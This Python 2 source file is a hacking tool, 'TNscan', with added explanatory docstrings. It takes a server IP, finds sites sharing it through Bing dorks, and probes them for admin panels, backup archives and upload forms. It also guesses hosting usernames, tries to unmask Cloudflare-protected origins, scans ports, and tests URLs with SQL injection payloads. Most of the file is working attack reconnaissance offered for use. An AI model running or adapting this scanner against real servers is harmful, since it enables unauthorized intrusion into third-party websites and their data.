#!/usr/bin/env python2
# >>> Bism Allah <<<
# Code Name : TNscan v1.0
# Coder : MatriX Coder (17 yo guy from Tunisia)
# Blog : www.matrixcoder.co.vu
# Twitter : MatriX_Coder
# Pastebin : www.pastebin.com/u/matrixcoder
# this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
# Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
# greats also to tunisia fallega team and to madleets team and to you !
# Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
import re, urllib2, urllib, os, socket, sys
from platform import system
# ASCII banner printed at start-up and again after every menu round-trip.
# This is an ordinary (non-raw) triple-quoted string: the "\t" escapes become
# tabs, while the other backslashes are not valid escape sequences and are
# therefore kept literally as part of the art.
logo = """
\t _____ _ _
\t|_ _| \ | |
\t | | | \| |___ ___ __ _ _ __
\t | | | . ` / __|/ __/ _` | '_ \
\t | | | |\ \__ \ (_| (_| | | | |
\t \_/ \_| \_/___/\___\__,_|_| |_| v1.0
"""
# Interactive menu text.  The dispatch on the chosen number lives in
# TNscan.__init__; option 9 is listed here but has no handler there.
menu = """
1) Get all websites
2) Get joomla websites
3) Get wordpress websites
4) Find control panel
5) Find zip files
6) Find upload files
7) Get server users
8) Scan from SQL injection
9) Crawl and scan from SQL injection (soon)
10) Scan ports (range of ports)
11) Scan ports (common ports )
12) Get server banner
13) Bypass Cloudflare
14) About !
99) Exit
"""
def unique(seq):
    """
    Return a list of the elements of *seq* with duplicates removed,
    preserving the order of first appearance.  Elements must be hashable.
    (The author credits the original one-liner to stackoverflow.)
    """
    seen = set()
    ordered = []
    for item in seq:
        if item in seen:
            continue
        seen.add(item)
        ordered.append(item)
    return ordered
def clearScr() :
    """
    Clear the terminal by running the platform's clear command:
    ``clear`` on Linux, ``cls`` on Windows, nothing on any other system.
    The command string is fixed, so no user input reaches the shell here.
    """
    commands = {'Linux': 'clear', 'Windows': 'cls'}
    command = commands.get(system())
    if command is not None:
        os.system(command)
class TNscan :
    """
    Interactive, menu-driven reconnaissance helper for a single server
    address (Python 2: print statements, raw_input, urllib2).

    ``__init__`` runs the whole session: it first fills ``self.sites`` with
    the hosts Bing reports for the address, then loops over the menu until
    the user picks 99 or answers "N" to the continue prompt.  Every method
    prints its results to stdout; none of them return a value.  All network
    requests are sequential, unauthenticated and made without a timeout.
    """
    def __init__(self, serverip) :
        # serverip: address or hostname given on the command line.  It is
        # interpolated verbatim into the Bing query URLs and used as the
        # target of the port scan and banner grab.
        self.serverip = serverip
        # Populate self.sites up-front; findPanels/findZip/findUp/getUsers/
        # cloudflareBypasser all iterate over it.  False = don't print it.
        self.getSites(False)
        print menu
        while True :
            choice = raw_input(' Enter choice -> ')
            if choice == '1' :
                self.getSites(True)
            elif choice == '2' :
                self.getJoomla()
            elif choice == '3' :
                self.getWordpress()
            elif choice == '4' :
                self.findPanels()
            elif choice == '5' :
                self.findZip()
            elif choice == '6' :
                self.findUp()
            elif choice == '7' :
                self.getUsers()
            elif choice == '8' :
                self.grabSqli()
            # Menu option 9 (crawl and scan) has no branch: it falls through
            # to the "Continue" prompt like any other unrecognised input.
            elif choice == '10' :
                ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
                self.portScanner(1, ran)
            elif choice == '11' :
                self.portScanner(2, None)
            elif choice == '12' :
                self.getServerBanner()
            elif choice == '13' :
                self.cloudflareBypasser()
            elif choice == '14' :
                self.aboutME()
            elif choice == '99' :
                print ' Goodbye'
                exit()
            con = raw_input(' Continue [Y/n] -> ')
            # con[0] raises IndexError on an empty answer; that propagates
            # out of the constructor to the IndexError handler in __main__,
            # which then prints the usage line.
            if con[0].upper() == 'N' :
                exit()
            else :
                clearScr()
                print logo
                print menu
    def aboutME(self) :
        """
        Clear the screen and print the author/credits banner (the same
        text as the file header).
        """
        clearScr()
        print """
>>> Bism Allah <<<
Code Name : TNscan v1.0
Coder : MatriX Coder (17 yo guy from Tunisia)
Blog : www.matrixcoder.co.vu
Twitter : MatriX_Coder
Pastebin : www.pastebin.com/u/matrixcoder
this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
greats also to tunisian fallega team, to madleets team and to you !
Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
"""
    def getSites(self, a) :
        """
        Fill ``self.sites`` with the hosts Bing lists for ``ip:<serverip>``.

        Issues up to three Bing searches (first=1, 51, 101; 50 results each),
        pulls the result links out of the HTML with a regex, normalises each
        host to ``http://www.<host>/`` (or ``http://<host>/`` when the host
        already contains "www") and stores the de-duplicated list in
        ``self.sites``.

        a -- when true, clear the screen and print the list afterwards.
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                # Scrapes live Bing result markup; if Bing changes its HTML
                # this simply yields an empty list, with no error.
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    allnoclean = findwebs[i]
                    findall1 = re.findall('http://(.*?)/', allnoclean)
                    for idx, item in enumerate(findall1):
                        # 'www' anywhere in the host counts, not only as a prefix
                        if 'www' not in item:
                            findall1[idx] = 'http://www.' + item + '/'
                        else:
                            findall1[idx] = 'http://' + item + '/'
                    lista.extend(findall1)
                # page only advances on success: a URLError (e.g. no network)
                # leaves it unchanged and this loop retries the same page forever.
                page += 50
            except urllib2.URLError:
                pass
        self.sites = unique(lista)
        if a :
            clearScr()
            # len(lista) still counts duplicates; self.sites is de-duplicated
            print '[*] Found ', len(lista), ' Website\n'
            for site in self.sites :
                print site
    def getWordpress(self) :
        """
        Print the sites Bing lists for ``ip:<serverip> ?page_id=``.

        Same three-page Bing scrape as getSites, narrowed with the
        ``?page_id=`` dork; the part of each result link before
        ``?page_id=`` is treated as the site.  The list is printed only,
        not stored on the instance.
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    wpnoclean = findwebs[i]
                    findwp = re.findall('(.*?)\?page_id=', wpnoclean)
                    lista.extend(findwp)
                # page only advances on success and the bare except hides
                # every failure, so a persistent error loops here forever.
                page += 50
            except:
                pass
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Wordpress Website\n'
        for site in lista :
            print site
    def getJoomla(self) :
        """
        Print the sites Bing lists for ``ip:<serverip> index.php?option=com``.

        Same Bing scrape as getSites, narrowed with the Joomla dork; the part
        of each result link before ``index.php`` is treated as the site.
        Unlike the sibling methods there is no try/except here, so a failed
        request propagates out of the menu loop.
        """
        lista = []
        page = 1
        while page <= 101:
            bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                jmnoclean = findwebs[i]
                findjm = re.findall('(.*?)index.php', jmnoclean)
                lista.extend(findjm)
            page += 50
        lista = unique(lista)
        clearScr()
        print '[*] Found ', len(lista), ' Joomla Website\n'
        for site in lista :
            print site
    def findPanels(self) :
        """
        Request every path in ``adminList`` under each site in ``self.sites``
        and print the ones that answer with HTTP status 200.

        Only the status code is inspected, so a site that serves a 200
        catch-all page reports every path.  One sequential GET per
        (site, path) pair, no timeout, no error handling: a connection
        failure raises out of the method.
        """
        adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
        clearScr()
        for site in self.sites :
            for admin in adminList :
                if urllib.urlopen(site + admin).getcode() == 200 :
                    print " [*] Found admin panel -> ", site + admin
    def findZip(self) :
        """
        Request every path in ``zipList`` under each site in ``self.sites``
        and print the ones that answer with HTTP status 200.

        Same caveats as findPanels: status code only (a catch-all 200 page
        matches everything), sequential, no timeout, no error handling.
        """
        zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
        clearScr()
        for site in self.sites :
            for zip1 in zipList :
                if urllib.urlopen(site + zip1).getcode() == 200 :
                    print " [*] Found zip file -> ", site + zip1
    def findUp(self) :
        """
        Request every path in ``upList`` under each site in ``self.sites``;
        for each path that answers 200, fetch it a second time and print it
        once per response line that contains ``type=file``.

        Same caveats as findPanels (sequential, no timeout, no error
        handling); matched paths are requested twice.
        """
        upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
        clearScr()
        for site in self.sites :
            for up in upList :
                if (urllib.urlopen(site + up).getcode() == 200) :
                    html = urllib.urlopen(site + up).readlines()
                    for line in html :
                        if re.findall('type=file', line) :
                            print " [*] Found upload -> ", site+up
    def getUsers(self) :
        """
        Derive a candidate account name from each site name (scheme, dots,
        dashes and slashes stripped), probe
        ``/cgi-sys/guestbook.cgi?user=<name>`` with ever-shorter prefixes of
        it, and print every name whose response does not contain
        "invalid username".  The author attributes the technique to others.

        NOTE(review): the whole body sits in a bare ``except: pass``, so any
        failure is silent.  The final loop reads ``userlist``, which is never
        assigned (the accumulator built above is ``userslist``).
        """
        userslist = []
        for site in self.sites :
            try:
                site = site.replace('http://www.', '')
                site = site.replace('http://', '')
                site = site.replace('.', '')
                if '-' in site:
                    site = site.replace('-', '')
                site = site.replace('/', '')
                while len(site) > 2:
                    resp = urllib2.urlopen(site + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
                    if 'invalid username' not in resp.lower():
                        print '\t [*] Found -> ', site
                        userslist.append(site)
                    else :
                        print site
                    # shorten the candidate by one character from the right
                    site = site[:-1]
                clearScr()
                for user in userlist :
                    print user
            except:
                pass
    def cloudflareBypasser(self) :
        """
        For each site, resolve the host itself and then its ``mail``,
        ``webmail``, ``ftp``, ``direct`` and ``cpanel`` subdomains, and print
        a subdomain's address when it differs from the site's own.

        NOTE(review): both ``replace`` calls discard their result, so
        ``site`` reaches gethostbyname unchanged; and ``ip`` is only bound
        when the base lookup succeeds, otherwise the comparison below sees a
        stale value from an earlier site (or an unbound name).
        """
        clearScr()
        # Fixed subdomain list: the DNS queries for these names are the
        # observable footprint of this option.
        subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
        for site in self.sites :
            site.replace('http://', '')
            site.replace('/', '')
            try:
                ip = socket.gethostbyname(site)
            except socket.error:
                pass
            for sub in subdoms:
                doo = sub + '.' + site
                print ' [~] Trying -> ', doo
                try:
                    ddd = socket.gethostbyname(doo)
                    if ddd != ip:
                        print ' [*] Cloudflare bypassed -> ', ddd
                        break
                except socket.error :
                    pass
    def getServerBanner(self) :
        """
        GET ``http://<serverip>`` and print its ``Server`` response header
        (``None`` is printed when the header is absent).  Any error,
        network or otherwise, is swallowed by the bare except.
        """
        clearScr()
        try:
            s = 'http://' + self.serverip
            httpresponse = urllib.urlopen(s)
            print ' [*] Server header -> ', httpresponse.headers.getheader('server')
        except:
            pass
    def grabSqli(self) :
        """
        Collect every Bing result link for ``ip:<serverip> php?id=`` (three
        pages, as in getSites), de-duplicate the list and hand it to
        checkSqli.  Here ``page`` is advanced outside the try, so a failed
        page is skipped rather than retried.
        """
        page = 1
        lista = []
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                for i in range(len(findwebs)):
                    x = findwebs[i]
                    lista.append(x)
            except:
                pass
            page += 50
        lista = unique(lista)
        self.checkSqli(lista)
    def checkSqli(self, s):
        """
        Error-based SQL-injection probe over the URLs in ``s`` (the author
        credits most of this to the webpwn3r project).

        For each URL, every ``key=value`` piece of its query string is
        suffixed in turn with each payload (via ``str.replace`` on the whole
        URL, so a piece that occurs twice is changed twice), the page is
        fetched, and the URL is printed once per response line matching the
        ``check`` regex of database error messages.  A URL without ``?``
        raises IndexError, which the bare except swallows along with every
        network error.

        s -- iterable of URL strings; nothing is returned.
        """
        clearScr()
        payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
        # The detection signal is verbose database error text in the
        # response body; an application that returns a generic error page
        # never matches this regex.
        check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
        for url in s:
            try:
                for param in url.split('?')[1].split('&'):
                    for payload in payloads:
                        # payload.strip() is a no-op on these literals
                        power = url.replace(param, param + payload.strip())
                        #print power
                        html = urllib2.urlopen(power).readlines()
                        for line in html:
                            checker = re.findall(check, line)
                            if len(checker) != 0 :
                                print ' [*] SQLi found -> ', power
            except:
                pass
    def crawlSqli(self) :
        """
        Placeholder for the crawl-and-scan feature (menu option 9, which has
        no handler in __init__, so this is never called).  The author planned
        to build it on chilkat in a later version.
        """
        pass
    def portScanner(self, mode, ran) :
        """
        TCP connect() scan of ``self.serverip`` (al-swisre idea).

        mode -- 1: scan the ports given by ``ran``; 2: scan the fixed list
                of common ports below (``ran`` is ignored).
        ran  -- for mode 1, a "start-end" string; ``end`` itself is not
                scanned because range() excludes its upper bound.

        Each probe is a blocking connect_ex with no timeout (the settimeout
        line is commented out), so a port whose packets are dropped can
        stall for the OS connect timeout.  Ports are reported only when the
        connect succeeds; closed and filtered ports print nothing.
        """
        clearScr()
        def do_it(ip, port):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            #sock.settimeout(5)
            # sock is rebound to the integer result of connect_ex, so the
            # socket object is never closed explicitly (only reclaimed by GC).
            sock = sock.connect_ex((ip,port))
            if sock == 0:
                print " [*] Port %i is open" % port
        if mode == 1 :
            # int() raises ValueError on a malformed range; that propagates
            # out of the menu loop.
            a = ran.split('-')
            start = int(a[0])
            end = int(a[1])
            for i in range(start, end):
                do_it(self.serverip, i)
        elif mode == 2 :
            for port in [80,21,22,2082,25,53,110,443,143] :
                # didn't use multithreading cos it's few ports
                do_it(self.serverip, port)
if __name__ == '__main__' :
    # Entry point: the target address is the first CLI argument.  The
    # TNscan constructor runs the whole interactive session, so this try
    # block is live for the program's lifetime.
    # NOTE: the IndexError handler is meant for a missing argv[1], but it
    # also catches IndexErrors raised inside TNscan (e.g. con[0] on an
    # empty "Continue" answer), which then show up as the usage line.
    try :
        clearScr()
        print logo
        TNscan(sys.argv[1])
    except IndexError :
        print " [*] Usage : python "+sys.argv[0]+" 127.0.0.1"